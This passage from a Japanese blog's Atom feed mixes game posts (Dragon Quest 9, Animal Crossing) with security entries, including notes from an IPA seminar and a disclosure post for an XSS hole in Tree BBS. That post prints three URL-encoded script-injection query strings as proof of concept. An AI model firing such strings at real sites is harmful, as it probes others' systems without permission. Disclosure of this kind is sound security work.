href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>サンシャイン牧場の課金システムが修正されたっぽい</title><link href="http://bakera.jp/ebi/topic/3947" /><id>tag:bakera.jp,2008:/ebi/topic/3947</id><updated>2009-10-25T01:50:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/23">2009年10月23日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3947">サンシャイン牧場の課金システムが修正されたっぽい</a></h2><p class="subinfo"><span class="updated">更新: 2009年10月25日1時50分頃</span></p><p>サンシャイン牧場の課金システムですが、昼過ぎにとりあえずフロントのインターフェイスが停止、夕方にバックのシステムが停止しており、しばらくこのままだろうな……と思っていたら、なんと復活しているではありませんか。</p><p>問題を抱えたままの復活かと思いきや、ちゃんと修正されている模様です。修正にはもっと時間がかかるかと思っていましたが、これは速い! 良い仕事だと思います。ありがとうございます。</p><p class="note">※もっとも、正式な修正の報告はまだ受けていませんので、これで最終形なのかどうかはまだわかりません。</p><p class="note">※2009-10-25追記: いちおう、mixiコミュニティ内にて運営側から修正のアナウンスが出ています: <a href="../topic/3948">サンシャイン牧場・課金システム修正のアナウンス</a></p><p class="note">※2009-10-31追記: さらに追加のアナウンスがありました: 「<a href="../topic/3954">サンシャイン牧場・課金システムの問題についてのアナウンス</a>」</p><ul class="comment-link"><li><a href="../topic/3947/comment">「サンシャイン牧場の課金システムが修正されたっぽい」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B5%E3%83%B3%E3%82%B7%E3%83%A3%E3%82%A4%E3%83%B3%E7%89%A7%E5%A0%B4">サンシャイン牧場</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>Winny観測システムにおける裸族の活躍</title><link href="http://bakera.jp/ebi/topic/3941" /><id>tag:bakera.jp,2008:/ebi/topic/3941</id><updated>2009-10-19T15:45:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/19">2009年10月19日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3941">Winny観測システムにおける裸族の活躍</a></h2><p class="subinfo"><span class="updated">更新: 2009年10月19日15時45分頃</span></p><p>「<a href="http://takagi-hiromitsu.jp/diary/20091017.html#p01">誤報是正「無罪判決でWinny利用者増加」は誤り</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」。</p><p>内容より、観測システムの写真が興味深いと思ってしまいました。:-)</p><p>1.5TBのハードディスクがごろごろ、そして裸族 (たぶん、<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B001A0O8GQ&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">裸族のお立ち台DJ CROS2EU2</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B001A0O8GQ" alt="" width="1" height="1" /></span>)。裸族シリーズはこういう用途には向いていそうですね。</p><p class="note">※追記: 右側のケースも裸族でしたか……<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000I0RBZY&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">裸族の村</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000I0RBZY" alt="" width="1" height="1" /></span>。こちらは知りませんでした。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3941/comment">「Winny観測システムにおける裸族の活躍」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a></span></p></div></div></content></entry><entry><title>PHPの残念なお話</title><link href="http://bakera.jp/ebi/topic/3927" /><id>tag:bakera.jp,2008:/ebi/topic/3927</id><updated>2009-10-11T18:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/8">2009年10月8日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3927">PHPの残念なお話</a></h2><p class="subinfo"><span class="updated">更新: 2009年10月11日18時20分頃</span></p><p>こんなお話が。</p><ul><li><a href="http://d.hatena.ne.jp/IwamotoTakashi/20091005/p1">htmlspecialcharsのパッチ私案</a> <em class="domain-info">(d.hatena.ne.jp)</em></li><li><a href="http://bugs.php.net/bug.php?id=49785">PHP bugs: #49785: htmlspecialchars() should check byte sequence more strictly</a> <em class="domain-info">(bugs.php.net)</em></li><li><a href="http://d.hatena.ne.jp/IwamotoTakashi/20091006/p1">htmlspecialcharsに関する残念なお知らせ</a> <em class="domain-info">(d.hatena.ne.jp)</em></li></ul><p>それを受けてこんなお話も。</p><ul><li><a href="http://akimoto.jp/blog/2009/10/08/bug-report-in-foreign-language/">外国語ならなおさら、できる限りのことをしないと伝わらない</a> <em class="domain-info">(akimoto.jp)</em></li></ul><p>まあ、もとより、修正する義務もないわけですしね。</p><p>ただ理由はどうあれ、結果として「対応しない」という事なのですから、その事実をふまえて判断しなければなりません。</p><p>先行バイトで巻き込むタイプのXSSは、HTMLの構造によっては成立しない場合も多いですし、そこを慎重に判断した上で「気にしない」という選択をするのであれば、それはそれで問題ないでしょう。</p><p>気にする人は、例えば、PHPを避けるという対応を選択することになって「残念」と感じるかも知れませんが、まあ、それはそれで仕方ないのではないでしょうか。</p><p class="note">※2009-10-11追記: 結局、PHP側で対応されたようです……「<a href="http://d.hatena.ne.jp/IwamotoTakashi/20091009/p1">htmlspecialcharsに関する素敵なお知らせ</a> <em class="domain-info">(d.hatena.ne.jp)</em>」。</p><ul class="comment-link"><li><a href="../topic/3927/comment">「PHPの残念なお話」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/PHP">PHP</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>レベル99のドルマゲスを撃破</title><link href="http://bakera.jp/ebi/topic/3898" /><id>tag:bakera.jp,2008:/ebi/topic/3898</id><updated>2009-09-22T12:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/8/28">2009年8月28日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3898">レベル99のドルマゲスを撃破</a></h2><p class="subinfo"><span class="updated">更新: 2009年9月22日12時35分頃</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000LXD7HO&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ドラクエ9</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000LXD7HO" alt="" width="1" height="1" /></span>には過去作の魔王が登場する宝の地図があって、現時点ではバラモス、ムドー、ドルマゲス、竜王、デスピサロ、ミルドラースと戦うことができます。これらの魔王は最初は弱いのですが、戦闘に勝つと相手をレベルアップさせることができて、レベル99まで成長させることができます。</p><p>というわけで、ドルマゲスをレベル99まで上げてみました。行動はこんな感じ。</p><ul><li>打撃 …… バトルマスターが喰らうと350程度、僧侶が喰らうと400超のダメージ。盾ガード・みかわし可能</li><li>ドルマドン …… 闇属性単体攻撃。ダークフォースを使用していると2桁ダメージですが、切れていると400を超えるダメージに。実は盾ガード可能</li><li>マヒャデドス …… 氷属性全体攻撃。耐性装備で40%軽減しても300程度のダメージ。マヒャドと違って盾ガード不可能の模様</li><li>れんごく火炎 …… 炎の全体攻撃、330程度のダメージ。みかわし可能。</li><li>ラッシュ …… 100程度の打撃を4回。全弾が一人に集中すると危険ですが、たいてい何とかなります。盾ガード・みかわし可能。</li><li>フェザースコール …… 全体攻撃、360程度のダメージ。たぶん無属性。盾ガードもみかわしも不可</li><li>凍てつく波動 …… 全体の補助効果無効、テンションリセット。ダメージはありませんが厳しいです。テンションが溜まっているときに使われると泣きたくなります。</li><li>超おたけび …… 全体に1ターン休み効果。スーパーリングを装備していれば効きにくくなる模様</li></ul><p>で、1ターン3回行動です。これはひどい。痛恨の一撃がないのが救いです。</p><p>私が挑んだときのパーティーは賢者・僧侶・バトルマスター×2で、行動はこんな感じ。</p><ul><li>1ターン目 …… 賢者は「ダークフォース」、僧侶は「たたかいのうた」、バトルマスターは「テンションバーン」</li><li>2ターン目以降 …… 僧侶「ベホマズン」、他3人「はやぶさ斬り」。死者が出たり凍てつく波動を使われたりしたら適宜対応。</li></ul><p>実にシンプルですが、ドルマゲスの攻撃がきついので、僧侶は毎ターンベホマズンを強いられます。ベホマズンがあれば安定、と言いたいところですがフェザースコール+マヒャデドス+打撃が来るとHP840のバトルマスターも1ターンで死亡しますし、ドルマゲスは素早いので僧侶より先に行動されてしまうことがあります (ちなみに僧侶はガルーダの爪+ファントムマスク+武闘家の証で素早さ強化済み)。超おたけびで僧侶が行動不能になってもアウトです。凍てつく波動を連発されると戦闘が長引き、僧侶のMPが尽きることもあります (ベホマズンの消費MPは128、賢者スキルで軽減しても96)。</p><p>というわけで運頼みの戦いになりますが、まあなんとか撃破。初回撃破時は凍てつく波動を連発されて8ターンもかかりましたが、再挑戦では4ターン撃破。テンションバーンを使用しているので、運良くスーパーハイテンションになれればもっと短いターンで撃破できるかと思います。</p><p class="note">※賢者はザオリク要員というより「好きだから」入れているだけなので、僧侶2人にして世界樹の葉で蘇生した方が安定すると思います。あと、パラディンを入れて必殺技「パラディンガード」を使うようにすると楽かも。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3898/comment">「レベル99のドルマゲスを撃破」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A8">ドラクエ</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A89">ドラクエ9</a></span></p></div></div></content></entry><entry><title>ドラクエ9 クリア</title><link href="http://bakera.jp/ebi/topic/3875" /><id>tag:bakera.jp,2008:/ebi/topic/3875</id><updated>2009-07-19T13:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/7/16">2009年7月16日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3875">ドラクエ9 クリア</a></h2><p class="subinfo"><span class="updated">更新: 2009年7月19日13時35分頃</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000LXD7HO&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ドラゴンクエスト9 星空の守り人</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000LXD7HO" alt="" width="1" height="1" /></span>、エンディングらしきものは見たので一応クリアということで。レベル30～42のメンバーでしたが、ラスボス戦はだいぶ余裕がありました。バランス的には、全員30前後が目安でしょうか。</p><p>一応クリアしたとはいえ、まだ行っていないところがたくさんありますし、取っていない職業もあります。クリア後の要素もかなりたくさんあるようで。</p><ul><li>クエストが大量に発生。クエストに「ストーリー」アイコンがついたものもあって、これがクリア後のメインストーリーということらしいです。</li><li>クリアするとラストダンジョンには2度と入れない? セーブデータが1つしかないくせに、取り返しのつかない要素があるのはちょっと……。
<p class="note">※2009-07-19追記: ラストダンジョンは再突入可能でした。</p></li><li>各地で宝の地図が話題に。宝の地図メインで遊びなさいということですかね。なんかダンジョンのボスが2ターンで倒せたりするのですが、もっとレベルの高い地図を探せということかと。</li><li>戦歴画面からサンディが消滅。いなくなったらいなくなったで寂しいのですが、また会えるのですかね?
<p class="note">※2009-07-19追記: 再会可能でした。</p></li></ul><p>以下、一通りプレイした感想。</p><p>ストーリーは、ちょっとボリュームが少ないかもしれません。私は寄り道プレイ派なので時間がかかりましたが、まっすぐにクリアを目指せば20時間くらいで終わってしまうのではないでしょうか。短くてもストーリーが盛り上がれば良いのですが、正直、そこまで盛り上がるストーリーではないようにも思います。あと、細かいところですが仲間の扱いが微妙すぎ。天の箱船は普通の人間には見えないという設定なので、仲間は乗り込めないはずなのですが……箱船から下りると、何故か仲間もついてきているとか。</p><p>……などと書くとつまらなそうに思えるかもしれませんが、マルチプレイが非常に楽しいです。このゲームの本領はマルチプレイにあると言っても過言ではないでしょう。やっぱり、ゲームってみんなで集まってわいわい言いながら遊ぶのが楽しいのだと思いますね。「<a href="http://www.itmedia.co.jp/news/articles/0907/15/news061.html">「ドラクエ休暇」取る人続出!?</a> <em class="domain-info">(www.itmedia.co.jp)</em>」なんて話も出ていましたが、出社して会社でみんなでプレイする方が楽しいですよ。</p><p>マルチプレイをしている人としていない人とで、本作に対する評価は大きく分かれそうですね。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3875/comment">「ドラクエ9 クリア」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A8">ドラクエ</a> / <a href="../genre/%E3%83%89%E3%83%A9%E3%82%AF%E3%82%A89">ドラクエ9</a></span></p></div></div></content></entry><entry><title>どうぶつの森 サソリ・タランチュラ捕獲のコツ</title><link href="http://bakera.jp/ebi/topic/3864" /><id>tag:bakera.jp,2008:/ebi/topic/3864</id><updated>2009-07-10T02:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/7/6">2009年7月6日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3864">どうぶつの森 サソリ・タランチュラ捕獲のコツ</a></h2><p class="subinfo"><span class="updated">更新: 2009年7月10日2時20分頃</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000IUATEO&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">街へいこうよ どうぶつの森</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000IUATEO" alt="" width="1" height="1" /></span>。<a href="../topic/3856">大変なインシデント</a>を経て村が荒れ果てたためなのか、単に7月になったからなのか、サソリ・タランチュラの出現率が妙に上昇したような気がします。一晩でサソリと6回も遭遇しましたし。</p><p class="note">※まあ、そもそもサソリは6月には出現しませんが。</p><p>サソリ・タランチュラの捕獲にはコツがいりますが、せっかくなのでメモしておきます。まずは基本的な事項から。</p><ul><li>サソリ・タランチュラが出現するのは夜19:00以降。</li><li>他の虫と異なり、地面を歩いている。</li><li>こちらに気づいていない状態では、適当にうろうろ→停止、を繰り返す。</li></ul><p>問題はこちらに気づいた後の行動で、以下のようになります。</p><ul><li>こちらが網を持っていない場合、逃げていこうとする。</li><li>こちらが網を持つと、凄い勢いで襲いかかってくる。一度こうなると、網を外しても駄目。</li><li>少し離れた場所で大人しくしているとこちらを見失い、気づいていないときの状態に戻る。</li></ul><p>刺されてしまうと、その場に昏倒して画面が暗転し、家の前からの再スタートとなります。</p><p class="note">※これ、一機減っているのではないかと思いますが。:-) 残機という概念はないので、特にペナルティはありません。</p><p>さて、捕獲のコツ。</p><ul><li>まず、網を持たずに行動すること。網を持ったままで遭遇すると、あっという間に瞬殺されます。</li><li>気づかれずに発見できたら、ゆっくりと近づく。網が届く間合いになったら、相手が停止したところを見計らって網を装備し、捕獲。間合いを見誤ったら……刺されます。</li></ul><p>これでOKですが、「気づかれずに」というのが難しいです。相手に気づかれたときにどうするか。選択肢は2つあります。</p><ul><li>少し距離を置いてゆっくり追いかけ、見失うのを待つ</li><li>網を装備して真っ向勝負! 向かってきたところをタイミング良く捕獲。</li></ul><p>ところで、今作の村には崖があります。サソリが崖の下にいるとき、網を装備すると突進してきますが、サソリは崖を登れませんので、崖のところで止まります。そのままゆっくりと段差の少ないところまで移動すると、サソリは上ってこられないけれども網は届く、という状態になりますので、安全に捕獲できます。崖を活用しましょう。</p><div class="figure"><img src="../img/ruu0108" alt="" width="450" height="241" /></div><p>タランチュラにも同じ方法は使える……のですが、タランチュラはたまにジャンプしますので気をつけてください。安全な場所で一度ジャンプさせてから素早く行動するか、少し崖から離れてこちらを見失うのを待つか。</p><div class="figure"><img src="../img/ruu0109" alt="" width="450" height="241" /></div><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3864/comment">「どうぶつの森 サソリ・タランチュラ捕獲のコツ」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/Wii">Wii</a> / <a href="../genre/%E4%BB%BB%E5%A4%A9%E5%A0%82">任天堂</a> / <a href="../genre/%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">どうぶつの森</a> / <a href="../genre/%E8%A1%97%E3%81%B8%E3%81%84%E3%81%93%E3%81%86%E3%82%88%20%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">街へいこうよ どうぶつの森</a></span></p></div></div></content></entry><entry><title>JVN#93827000 レッツPHP! 製 Tree BBS におけるクロスサイトスクリプティングの脆弱性</title><link href="http://bakera.jp/ebi/topic/3650" /><id>tag:bakera.jp,2008:/ebi/topic/3650</id><updated>2009-06-30T18:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/6/26">2009年6月26日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3650">JVN#93827000 レッツPHP! 製 Tree BBS におけるクロスサイトスクリプティングの脆弱性</a></h2><p class="subinfo"><span class="updated">更新: 2009年6月30日18時30分頃</span></p><p>そういえば公開されていました。</p><ul><li><a href="http://jvn.jp/jp/JVN93827000/index.html">JVN#93827000 レッツPHP! 製 Tree BBS におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em></li><li><a href="http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-000044.html">JVNDB-2009-000044 レッツPHP! 製 Tree BBS におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvndb.jvn.jp)</em></li><li><a href="http://www.itmedia.co.jp/enterprise/articles/0906/25/news066.html">レッツPHP！製品に3件の脆弱性</a> <em class="domain-info">(www.itmedia.co.jp)</em></li><li><a href="http://japan.cnet.com/news/sec/story/0,2000056024,20395680,00.htm">レッツPHP!のBBSソフトにクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(japan.cnet.com)</em></li></ul><p>これはひたすら良くある<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>で、クエリ文字列にいろいろ入れると残念なことになります。届出に記載していたのはこんな3パターン。</p><div class="sample"><p>tree.php?all=%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e<br />tree.php?mode=root&amp;page=%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e<br />tree.php?n=%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e</p></div><p>Googleで検索してみるとかなりの数ヒットするので、けっこう使われている気がします。気がついた人は管理者に「更新してね」と言ってあげましょう。</p><p class="note">※「<a href="http://jvn.jp/jp/JVN32788272/index.html">JVN#32788272 レッツPHP! 製 PHP-I-BOARD におけるディレクトリトラバーサルの脆弱性</a> <em class="domain-info">(jvn.jp)</em>」というものも公開されていますが、これは別の方が届け出られたもので、別件です。たまたま同時期に届け出られて一緒に対応されたのだと思います。</p><ul class="comment-link"><li><a href="../topic/3650/comment">「JVN#93827000 レッツPHP! 製 Tree BBS におけるクロスサイトスクリプティングの脆弱性」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JVN">JVN</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>2009年度 IPA情報セキュリティセミナー 技術コース標準編</title><link href="http://bakera.jp/ebi/topic/3648" /><id>tag:bakera.jp,2008:/ebi/topic/3648</id><updated>2009-06-30T00:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/6/26">2009年6月26日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3648">2009年度 IPA情報セキュリティセミナー 技術コース標準編</a></h2><p class="subinfo"><span class="updated">更新: 2009年6月30日0時20分頃</span></p><p><a href="http://www.ipa.go.jp/security/event/2009/isec-semi/kaisai.html">2009年度 IPA情報セキュリティセミナー</a> <em class="domain-info">(www.ipa.go.jp)</em>開催。本当はマネジメントコースに参加したかったのですが、プレスリリースが出て間もないはずなのに受付終了していて断念、技術コースに出てみました。</p><p class="note">※実はこれ、参加無料の上に、タダで<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4839932409&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">情報セキュリティ白書2009</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4839932409" alt="" width="1" height="1" /></span>がもらえるという、目茶苦茶お得なセミナーなのですよね。すぐ埋まるのも頷けます。まあ、私は白書は既に持っていますけれど……。</p><p>以下、私が気になったポイントをメモ。あくまで私のメモなので、本筋の部分はあまりメモしていません。</p><div class="section"><h3 id="section16">情報セキュリティ10大脅威</h3><div class="section"><h4 id="section16-1">DNSキャッシュポイズニング</h4><ul><li>カミンスキーのアレ。</li><li>米国のISPのDNSが実際に攻撃を受けたとか。</li><li>DNS Ampの話 (いや、これ別の話になってますけど……)</li></ul></div><div class="section"><h4 id="section16-2">標的型攻撃</h4><ul><li>昔はexeやscrなどの実行ファイルが添付されてくるのが常套手段で、頑張って拡張子を偽装したりしていました。最近の攻撃ではdocやpdfなどの文書ファイルが添付されてきて、拡張子も本当にpdfやdoc。そしてリーダー側の脆弱性を突いてくるという。</li><li>IPAからのメールを装った攻撃もあり、文面はIPAのサイトの本物をコピペしたもの。これを機に、「IPAからは添付ファイル付きメールを送らない」というポリシーを定めた (ので、IPAから来たメールに添付ファイルが突いていたら偽物と判断して良い)。</li><li>防ぐのはなかなか難しい。標的型攻撃に関する情報収集と周知徹底が重要。</li></ul></div><div class="section"><h4 id="section16-3">情報漏洩</h4><ul><li>今年に入っても相変わらずWinny、Shareからの漏洩は多い。恥ずかしながら、IPAからもWinny経由で情報漏洩した人が出てしまった。</li><li>漏洩させないためのルールづくりが重要。IPAはそういうルールを持っていて、それ故、例の漏洩事件でもIPAの重要情報は漏れていなかった (漏洩したのは前職での情報)。</li><li>端末操作の履歴、USBメモリの無断使用禁止、等を定める。ルールが守られないこともあり得るが、それで事故が起きた場合はその個人の責任となる。</li><li>大企業では、会社支給の携帯電話を紛失したら懲戒処分となる場合がある。懲戒処分なので社報にも載る。罰を与えるというよりも、管理の重要性を周知するという意味合いが強い。</li><li>情報持ち出し時には暗号化を行う。たとえば、必要に応じて暗号化機能付きUSBメモリを貸し出すなど。</li></ul></div><div class="section"><h4 id="section16-4">ウィルス・ボットの感染経路</h4><ul><li>USBウィルス、と言われるがSDカードでも観戦。店頭のDP端末も感染した。不特定多数が使うPCは危険。</li><li>最近のボットは指令サーバが冗長化されている。ホットスタンバイで立ち上がってくる。</li><li>最近のPCはパワフルなので、ボットが動作していても動作が遅くなるなどの症状が出にくく、気付かない。</li></ul><ul><li>exeではない感染経路。PDF, MS Officeの脆弱性を悪用。「ウィルスはexe」の常識が覆る(一昔前はアイコン偽装、拡張子偽装)。見分ける方法は、出所を見るしかない。</li><li>USBメモリ経由の感染。「ネットに繋いでいないから安全」が覆る。オフライン、隔離ネットワークへの感染。</li><li>ボット感染の罠を仕込まれたサイト増加。SQLインジェクションで正規サイトに罠が埋め込まれている。</li></ul></div><div class="section"><h4 id="section16-5">脆弱な無線LAN</h4><ul><li>WEPはすぐに解読できる</li><li>無線LAN APただ乗り、不正メール送信に利用。ある日突然警察が……。</li><li>自分の家のAPをわざと脆弱にしてとぼけた、などという事例も。</li><li>WEPはだめ、WPA2+AES。</li><li>そもそも無線LANを使う必要があるのか?</li><li>パスワード/ネットワークキーに注意。IEEE802.1xでは最低20文字以上とされている。
<p class="note">※2009-06-30 追記: ここは私のメモの間違いで、「IEEE802.11 では、WPA2で“パスフレーズ”を設定する場合は最低でも20文字にする」が正解とのことです。<a href="../../htmlbbs/article/5487">コメント</a>参照。</p></li><li>WPS、AOSSなどの自動設定を使用するのも有効(ただし勝手に使われる事故も……知らないうちに子どもがDSを接続)。</li></ul></div><div class="section"><h4 id="section16-6">スパムメール</h4><ul><li>エラーメールに注意。偽装された送信元に大量のエラーメールを返すと、それがDoS攻撃になることも。</li><li>第三者中継を許すサーバは最近ほとんど見ないが、便利なアプライアンス(UTM)を入れたら、不正中継をするようになってしまったという事例も。チェックはすべき。</li></ul></div><div class="section"><h4 id="section16-7">ユーザIDとパスワードの使い回し</h4><ul><li>攻撃者は、マイナーサイトで盗み取ったIDとPASSをYahoo!で試す。</li><li>覚えられないが……「信頼できる」パスワード管理ソフトを使うのも手。</li></ul></div><div class="section"><h4 id="section16-8">正規サイトを経由した攻撃</h4><ul><li>難読化されたスクリプトの埋め込みが多発。GENO→中国サイトに飛ばされて感染。</li><li>難読化の意味……解読を困難にし、遷移先の分析を困難にする。<dfn class="glossary"><a href="../../glossary/%E6%94%B9%E7%AB%84">改竄</a></dfn>されたサイトの一覧をGoogleで取得することが難しくなる。訳の分からない文字列が大量にあったら危ないと思って良い。</li><li>GENOウィルスの感染例路は調査中だがなかなか分からない。SQLインジェクションで広まるわけではない、FTPのアカウントが盗まれているが、それがすべてでもない。FTP用の端末が感染し、PC内のHTMLにことごとく不正コード埋め込まれたり。</li><li>様々なサイトをリダイレクトして最終的にウィルスサイトにたどり着く「ナインボール」型。</li></ul></div><div class="section"><h4 id="section16-9">誘導型攻撃</h4><ul><li>誘導の手段
<ul><li>ネットサーフィン中に誘導される</li><li>スパムメールに記載のURL</li><li>添付ファイルクリックで</li><li>悪意あるバナー広告</li><li>謎のSEOで検索上位に出現</li></ul></li><li>利用される脆弱性
<ul><li>XSS</li><li>脆弱なソフトウェア</li></ul></li></ul></div><div class="section"><h4 id="section16-10">組み込み製品</h4><ul><li>組み込み製品のCSRFなど。</li><li>機器の設定画面をタブブラウザの複数タブで開かない。作業が終了したらブラウザを閉じる。</li></ul></div></div><div class="section"><h3 id="section17">脆弱性関連情報の届出状況</h3><ul><li>今週も「ウィルス対策ソフトがあればWindows Updateはしなくても良いのですよね?」って言われた。</li><li>届出情報が多すぎで担当者が死にそう。</li></ul><p class="note">※SQLインジェクションのサンプルが微妙かも。本来、攻撃者は 'john' を知る必要がないはずなので。XSSの説明も分かりにくいかも。検索サイトでCookieが盗まれて何が起きるのかと。</p></div><div class="section"><h3 id="section18">不正アクセスの届出状況</h3><ul><li>インターネット定点観測「TALOT2」: 10箇所で監視。サービスは特に動いていない状態で、ただ繋いで放置しておく。</li><li>一日あたり119箇所から372件のアクセス。</li><li>届出件数は減っている。が、被害は減っていない様子。届出を控える傾向にある?</li><li>統計では、SQLインジェクションは「侵入」に含めている。「その他」は不正プログラム埋め込み、なりすまし(他人のID・パスワードを利用)など。MMORPGの不正アクセスが増加している。</li></ul></div><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3648/comment">「2009年度 IPA情報セキュリティセミナー 技術コース標準編」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a 